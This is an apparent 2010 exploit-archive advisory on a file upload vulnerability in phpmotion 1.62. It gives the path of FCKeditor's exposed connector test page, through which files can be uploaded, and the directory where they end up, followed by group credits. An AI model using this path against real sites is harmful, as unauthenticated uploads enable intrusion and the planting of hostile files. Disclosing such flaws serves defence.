|    |    |    | Today: 23-Oct-2019 |

phpmotion/FCKeditor File upload vulnerabilities

November 24, 2010 | Posted in ExploitAlert

-----------------------------------------------------------------------
phpmotion/FCKeditor File upload vulnerabilities
-----------------------------------------------------------------------
Author : trycyber (trycyber@magelangcyber.com)
Homepage : http://indonesiancoder.com,magelangcyber.web.id
Vendor : http://www.phpmotion.com/
Dork : CIHUY ;p
Version : 1.62
Tested on : Win Xp sp2
Date : November 23, 2010
-----------------------------------------------------------------------

I. POC & Exploit
-----------------------------------------------------------------------
Default : http://127.0.0.1/

exploit : http://127.0.0.1/phpmotion/fckeditor/editor/filemanager/connectors/test.html

results in : http://127.0.0.1/userfiles/name of file

------------------------------------------------------------------------
Credits
------------------------------------------------------------------------
Allahu Akbar
INDONESIAN CODER ~ Magelangcyber-team ~ Kill-9 Crew ~ MC Crew
Don Tukulesto ~ kaMtiEz ~ ibl13z ~ Jundab ~ N4ck0 ~ Yurakha ~ aN93l1c ~ Mboys ~ Contrex ~ n4KuLa_
k4L0ng666 ~ Xr0b0t ~ Adipati ~ Arianom ~ t3ll0 ~ cimpli ~ Pathloader

-------------------------------------------------------------------------
"aku belajar bukan karenamu, melainkan aku ingin aku menjadi aku"

Indonesiancoder family & Magelangcyber family

Taged in: fckeditor, phpmotion, upload, vulnerabilities